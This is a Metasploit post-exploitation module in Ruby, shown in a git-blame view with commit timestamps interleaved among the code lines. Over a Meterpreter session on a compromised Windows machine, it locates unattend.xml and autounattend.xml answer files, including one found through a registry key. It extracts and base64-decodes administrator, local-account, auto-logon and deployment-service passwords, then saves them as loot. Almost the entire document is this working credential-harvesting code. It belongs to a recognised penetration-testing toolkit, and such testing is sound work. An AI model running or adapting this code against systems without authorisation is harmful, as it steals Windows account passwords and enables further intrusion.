2012-07-01 09:08:18 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/post/file'
|
|
|
|
require 'rexml/document'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2012-07-09 10:17:40 +00:00
|
|
|
'Name' => 'Windows Gather Unattended Answer File Enumeration',
|
2012-07-01 09:08:18 +00:00
|
|
|
'Description' => %q{
|
2012-07-09 10:17:40 +00:00
|
|
|
This module will check the file system for a copy of unattend.xml and/or
|
|
|
|
autounattend.xml found in Windows Vista, or newer Windows systems. And then
|
|
|
|
extract sensitive information such as usernames and decoded passwords.
|
2012-07-01 09:08:18 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2012-07-02 00:23:34 +00:00
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Sean Verity <veritysr1980[at]gmail.com>',
|
2012-07-09 10:17:40 +00:00
|
|
|
'sinn3r',
|
|
|
|
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
|
2012-07-02 00:23:34 +00:00
|
|
|
],
|
|
|
|
'References' =>
|
2012-07-01 09:15:11 +00:00
|
|
|
[
|
2012-07-09 10:17:40 +00:00
|
|
|
['URL', 'http://technet.microsoft.com/en-us/library/ff715801'],
|
|
|
|
['URL', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx']
|
2012-07-01 09:15:11 +00:00
|
|
|
],
|
2012-07-01 09:08:18 +00:00
|
|
|
'Platform' => [ 'windows' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
2012-07-09 10:17:40 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptBool.new('GETALL', [true, 'Collect all unattend.xml that are found', true])
|
|
|
|
], self.class)
|
2012-07-01 09:08:18 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Determie if unattend.xml exists or not
|
|
|
|
#
|
|
|
|
def unattend_exists?(xml_path)
|
|
|
|
x = session.fs.file.stat(xml_path) rescue nil
|
|
|
|
return !x.nil?
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
2012-07-09 10:17:40 +00:00
|
|
|
# Read and parse the XML file
|
2012-07-01 09:08:18 +00:00
|
|
|
#
|
|
|
|
def load_unattend(xml_path)
|
|
|
|
print_status("Reading #{xml_path}")
|
|
|
|
f = session.fs.file.new(xml_path)
|
2012-07-09 10:17:40 +00:00
|
|
|
raw = ""
|
2012-07-01 09:08:18 +00:00
|
|
|
until f.eof?
|
2012-07-09 10:17:40 +00:00
|
|
|
raw << f.read
|
2012-07-01 09:08:18 +00:00
|
|
|
end
|
|
|
|
|
2012-07-01 18:50:43 +00:00
|
|
|
begin
|
2012-07-09 10:17:40 +00:00
|
|
|
xml = REXML::Document.new(raw)
|
2012-07-01 18:50:43 +00:00
|
|
|
rescue REXML::ParseException => e
|
|
|
|
print_error("Invalid XML format")
|
|
|
|
vprint_line(e.message)
|
2012-07-09 10:17:40 +00:00
|
|
|
return nil, raw
|
2012-07-01 18:50:43 +00:00
|
|
|
end
|
2012-07-01 09:08:18 +00:00
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
return xml, raw
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Extract sensitive data from UserAccounts
|
|
|
|
#
|
|
|
|
def extract_useraccounts(user_accounts)
|
|
|
|
return[] if user_accounts.nil?
|
2012-07-01 09:08:18 +00:00
|
|
|
|
|
|
|
cred_tables = []
|
|
|
|
account_types = ['AdministratorPassword', 'DomainAccounts', 'LocalAccounts']
|
|
|
|
account_types.each do |t|
|
2012-07-09 10:17:40 +00:00
|
|
|
element = user_accounts.elements[t]
|
|
|
|
next if element.nil?
|
2012-07-01 09:08:18 +00:00
|
|
|
|
|
|
|
case t
|
|
|
|
#
|
|
|
|
# Extract the password from AdministratorPasswords
|
|
|
|
#
|
|
|
|
when account_types[0]
|
|
|
|
table = Rex::Ui::Text::Table.new({
|
|
|
|
'Header' => 'AdministratorPasswords',
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' => ['Username', 'Password']
|
|
|
|
})
|
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
password = element.elements['Value'].get_text.value rescue ''
|
|
|
|
plaintext = element.elements['PlainText'].get_text.value rescue 'true'
|
2012-07-02 20:56:25 +00:00
|
|
|
|
|
|
|
if plaintext == 'false'
|
|
|
|
password = Rex::Text.decode_base64(password)
|
|
|
|
password = password.gsub(/#{Rex::Text.to_unicode('AdministratorPassword')}$/, '')
|
|
|
|
end
|
|
|
|
|
2012-07-01 09:08:18 +00:00
|
|
|
if not password.empty?
|
|
|
|
table << ['Administrator', password]
|
|
|
|
cred_tables << table
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Extract the sensitive data from DomainAccounts.
|
|
|
|
# According to MSDN, unattend.xml doesn't seem to store passwords for domain accounts
|
|
|
|
#
|
|
|
|
when account_types[1] #DomainAccounts
|
|
|
|
table = Rex::Ui::Text::Table.new({
|
|
|
|
'Header' => 'DomainAccounts',
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' => ['Username', 'Group']
|
|
|
|
})
|
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
element.elements.each do |account_list|
|
|
|
|
name = account_list.elements['DomainAccount/Name'].get_text.value rescue ''
|
|
|
|
group = account_list.elements['DomainAccount/Group'].get_text.value rescue 'true'
|
2012-07-01 09:08:18 +00:00
|
|
|
|
|
|
|
table << [name, group]
|
|
|
|
end
|
|
|
|
|
|
|
|
cred_tables << table if not table.rows.empty?
|
|
|
|
|
|
|
|
#
|
|
|
|
# Extract the username/password from LocalAccounts
|
|
|
|
#
|
|
|
|
when account_types[2] #LocalAccounts
|
|
|
|
table = Rex::Ui::Text::Table.new({
|
|
|
|
'Header' => 'LocalAccounts',
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' => ['Username', 'Password']
|
|
|
|
})
|
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
element.elements.each do |local|
|
|
|
|
password = local.elements['Password/Value'].get_text.value rescue ''
|
|
|
|
plaintext = local.elements['Password/PlainText'].get_text.value rescue 'true'
|
2012-07-02 20:56:25 +00:00
|
|
|
|
|
|
|
if plaintext == 'false'
|
|
|
|
password = Rex::Text.decode_base64(password)
|
|
|
|
password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
|
|
|
|
end
|
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
username = local.elements['Name'].get_text.value rescue ''
|
2012-07-01 09:08:18 +00:00
|
|
|
table << [username, password]
|
|
|
|
end
|
|
|
|
|
|
|
|
cred_tables << table if not table.rows.empty?
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
return cred_tables
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
#
|
|
|
|
# Extract sensitive data from AutoLogon
|
|
|
|
#
|
|
|
|
def extract_autologon(auto_logon)
|
|
|
|
return [] if auto_logon.nil?
|
|
|
|
|
|
|
|
domain = auto_logon.elements['Domain'].get_text.value rescue ''
|
|
|
|
username = auto_logon.elements['Username'].get_text.value rescue ''
|
|
|
|
password = auto_logon.elements['Password/Value'].get_text.value rescue ''
|
|
|
|
plaintext = auto_logon.elements['Password/PlainText'].get_text.value rescue 'true'
|
|
|
|
|
|
|
|
if plaintext == 'false'
|
|
|
|
password = Rex::Text.decode_base64(password)
|
|
|
|
password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
|
|
|
|
end
|
|
|
|
|
|
|
|
table = Rex::Ui::Text::Table.new({
|
|
|
|
'Header' => 'AutoLogon',
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' => ['Domain', 'Username', 'Password']
|
|
|
|
})
|
|
|
|
|
|
|
|
table << [domain, username, password]
|
|
|
|
|
|
|
|
return [table]
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Extract sensitive data from Deployment Services.
|
|
|
|
# We can only seem to add one <Login> with Windows System Image Manager, so
|
|
|
|
# we'll only enum one.
|
|
|
|
#
|
|
|
|
def extract_deployment(deployment)
|
|
|
|
return [] if deployment.nil?
|
|
|
|
|
|
|
|
domain = deployment.elements['Login/Credentials/Domain'].get_text.value rescue ''
|
|
|
|
username = deployment.elements['Login/Credentials/Username'].get_text.value rescue ''
|
|
|
|
password = deployment.elements['Login/Credentials/Password'].get_text.value rescue ''
|
|
|
|
plaintext = deployment.elements['Login/Credentials/Password/PlainText'].get_text.value rescue 'true'
|
|
|
|
|
|
|
|
if plaintext == 'false'
|
|
|
|
password = Rex::Text.decode_base64(password)
|
|
|
|
password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
|
|
|
|
end
|
|
|
|
|
|
|
|
table = Rex::Ui::Text::Table.new({
|
|
|
|
'Header' => 'WindowsDeploymentServices',
|
|
|
|
'Indent' => 1,
|
|
|
|
'Columns' => ['Domain', 'Username', 'Password']
|
|
|
|
})
|
|
|
|
|
|
|
|
table << [domain, username, password]
|
|
|
|
|
|
|
|
return [table]
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2012-07-01 09:08:18 +00:00
|
|
|
#
|
|
|
|
# Save Rex tables separately
|
|
|
|
#
|
|
|
|
def save_cred_tables(cred_tables)
|
|
|
|
cred_tables.each do |t|
|
|
|
|
vprint_line("\n#{t.to_s}\n")
|
2012-07-09 14:44:22 +00:00
|
|
|
p = store_loot('windows.unattended.creds', 'text/csv', session, t.to_csv, t.header, t.header)
|
2012-07-01 09:08:18 +00:00
|
|
|
print_status("#{t.header} saved as: #{p}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
# Save the raw version of unattend.xml
|
|
|
|
#
|
2012-07-09 14:44:22 +00:00
|
|
|
def save_raw(xmlpath, data)
|
|
|
|
return if data.empty?
|
|
|
|
fname = ::File.basename(xmlpath)
|
|
|
|
p = store_loot('windows.unattended.raw', 'text/plain', session, data)
|
|
|
|
print_status("Raw version of #{fname} saved as: #{p}")
|
2012-07-01 09:08:18 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
#
|
|
|
|
# If we spot a path for the answer file, we should check it out too
|
|
|
|
#
|
|
|
|
def get_registry_unattend_path
|
|
|
|
# HKLM\System\Setup!UnattendFile
|
|
|
|
begin
|
|
|
|
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM')
|
|
|
|
fname = key.query_value('Setup!UnattendFile').data
|
|
|
|
return fname
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError
|
|
|
|
return ''
|
2012-07-01 09:08:18 +00:00
|
|
|
end
|
2012-07-09 10:17:40 +00:00
|
|
|
end
|
2012-07-01 09:08:18 +00:00
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# Initialize all 7 possible paths for the answer file
|
|
|
|
#
|
|
|
|
def init_paths
|
|
|
|
drive = session.fs.file.expand_path("%SystemDrive%")
|
2012-07-09 14:44:22 +00:00
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
files =
|
|
|
|
[
|
|
|
|
'unattend.xml',
|
|
|
|
'autounattend.xml'
|
|
|
|
]
|
|
|
|
|
|
|
|
target_paths =
|
|
|
|
[
|
|
|
|
"#{drive}\\",
|
|
|
|
"#{drive}\\Windows\\System32\\sysprep\\",
|
|
|
|
"#{drive}\\Windows\\panther\\",
|
|
|
|
"#{drive}\\Windows\\Panther\Unattend\\",
|
|
|
|
"#{drive}\\Windows\\System32\\"
|
|
|
|
]
|
|
|
|
|
|
|
|
paths = []
|
|
|
|
target_paths.each do |p|
|
|
|
|
files.each do |f|
|
|
|
|
paths << "#{p}#{f}"
|
|
|
|
end
|
2012-07-01 09:08:18 +00:00
|
|
|
end
|
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
# If there is one for registry, we add it to the list too
|
|
|
|
reg_path = get_registry_unattend_path
|
|
|
|
paths << reg_path if not reg_path.empty?
|
2012-07-01 09:08:18 +00:00
|
|
|
|
2012-07-09 10:17:40 +00:00
|
|
|
return paths
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def run
|
2012-07-09 14:44:22 +00:00
|
|
|
init_paths.each do |xml_path|
|
2012-07-09 10:17:40 +00:00
|
|
|
# If unattend.xml doesn't exist, move on to the next one
|
|
|
|
if not unattend_exists?(xml_path)
|
|
|
|
vprint_error("#{xml_path} not found")
|
|
|
|
next
|
|
|
|
end
|
|
|
|
|
|
|
|
xml, raw = load_unattend(xml_path)
|
2012-07-09 14:44:22 +00:00
|
|
|
save_raw(xml_path, raw)
|
2012-07-09 10:17:40 +00:00
|
|
|
|
|
|
|
# XML failed to parse, will not go on from here
|
|
|
|
return if not xml
|
|
|
|
|
|
|
|
# Extract the credentials
|
|
|
|
tables = []
|
|
|
|
unattend = xml.elements['unattend']
|
|
|
|
return if unattend.nil?
|
|
|
|
|
|
|
|
unattend.each_element do |settings|
|
|
|
|
next if settings.class != REXML::Element
|
|
|
|
settings.get_elements('component').each do |c|
|
|
|
|
next if c.class != REXML::Element
|
|
|
|
tables << extract_useraccounts(c.elements['UserAccounts'])
|
|
|
|
tables << extract_autologon(c.elements['AutoLogon'])
|
|
|
|
tables << extract_deployment(c.elements['WindowsDeploymentServices'])
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Save the data
|
2012-07-09 14:44:22 +00:00
|
|
|
save_cred_tables(tables.flatten) if not tables.empty?
|
2012-07-09 10:17:40 +00:00
|
|
|
|
|
|
|
return if not datastore['GETALL']
|
|
|
|
end
|
2012-07-01 09:08:18 +00:00
|
|
|
end
|
|
|
|
end
|